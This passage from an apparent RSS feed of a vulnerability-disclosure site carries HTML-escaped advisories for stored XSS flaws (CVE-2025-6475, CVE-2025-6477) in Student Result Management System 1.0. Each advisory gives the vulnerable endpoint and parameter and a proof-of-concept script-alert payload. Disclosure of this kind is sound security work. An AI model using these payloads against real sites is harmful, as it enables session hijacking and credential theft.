&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6699/image-1.png&amp;#34;
	width=&amp;#34;1897&amp;#34;
	height=&amp;#34;977&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6699/image-1_hu_2e98a5ecd10ad09a.png 480w, /p/cve-2025-6699/image-1_hu_cb0508422329be41.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;194&amp;#34;
		data-flex-basis=&amp;#34;465px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6699/image-2.png&amp;#34;
	width=&amp;#34;1888&amp;#34;
	height=&amp;#34;990&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6699/image-2_hu_b72551845a60d67a.png 480w, /p/cve-2025-6699/image-2_hu_e0f624d860a6c52d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;457px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6699/image-3.png&amp;#34;
	width=&amp;#34;1894&amp;#34;
	height=&amp;#34;995&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6699/image-3_hu_997e017ab8448d57.png 480w, /p/cve-2025-6699/image-3_hu_87728583f92c7b21.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;456px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/1RlctPW0nhw&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/1RlctPW0nhw&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6699.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6699.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6475</title>
        <link>https://www.cvehunters.com/p/cve-2025-6475/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-6475/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6475-cross-site-scripting-xss-stored-endpoint-students-parameter-first-name&amp;#34;&amp;gt;CVE-2025-6475: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;students&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6475&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6475&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;students&amp;lt;/code&amp;gt; endpoint of the Student Result Management System 1.0 (SRMS 1.0) application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6475-cross-site-scripting-xss-stored-endpoint-students-parameter-first-name&amp;#34;&amp;gt;CVE-2025-6475: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;students&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6475&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6475&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;students&amp;lt;/code&amp;gt; endpoint of the Student Result Management System 1.0 (SRMS 1.0) application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/srms/script/admin/students&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB SRMS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6475/image.png&amp;#34;
	width=&amp;#34;1883&amp;#34;
	height=&amp;#34;989&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6475/image_hu_71491be5bdea0f0e.png 480w, /p/cve-2025-6475/image_hu_92cd8e49ca5dfcb1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;456px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6475/image-1.png&amp;#34;
	width=&amp;#34;1908&amp;#34;
	height=&amp;#34;986&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6475/image-1_hu_cf4dd5bb1ea8a37b.png 480w, /p/cve-2025-6475/image-1_hu_fbd362652743b24f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;464px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6475/image-2.png&amp;#34;
	width=&amp;#34;1905&amp;#34;
	height=&amp;#34;987&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6475/image-2_hu_3e8433f59e31d0f4.png 480w, /p/cve-2025-6475/image-2_hu_ad04074a8049b310.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;463px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/rBtUzvmoIxc&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/rBtUzvmoIxc&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6475.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6475.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 22 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6477</title>
        <link>https://www.cvehunters.com/p/cve-2025-6477/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-6477/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6477-cross-site-scripting-xss-stored-endpoint-system-parameter-school-name&amp;#34;&amp;gt;CVE-2025-6477: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;system&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6477&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6477&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;system&amp;lt;/code&amp;gt; endpoint of the Student Result Management System 1.0 (SRMS 1.0) application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6477-cross-site-scripting-xss-stored-endpoint-system-parameter-school-name&amp;#34;&amp;gt;CVE-2025-6477: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;system&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6477&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6477&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;system&amp;lt;/code&amp;gt; endpoint of the Student Result Management System 1.0 (SRMS 1.0) application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/script/admin/system&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB SRMS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6477/image.png&amp;#34;
	width=&amp;#34;1909&amp;#34;
	height=&amp;#34;990&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6477/image_hu_7cde227e4d03ee28.png 480w, /p/cve-2025-6477/image_hu_a896ba7965cb155.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6477/image-1.png&amp;#34;
	width=&amp;#34;1909&amp;#34;
	height=&amp;#34;989&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6477/image-1_hu_f09a3ad56b404d14.png 480w, /p/cve-2025-6477/image-1_hu_e0f5609d6ecb5124.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;463px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6477/image-2.png&amp;#34;
	width=&amp;#34;1887&amp;#34;
	height=&amp;#34;1005&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6477/image-2_hu_117d198a06d18269.png 480w, /p/cve-2025-6477/image-2_hu_7046a41012ca59a3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;450px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/FhPQLGorbqA&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/FhPQLGorbqA&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6477.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6477.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
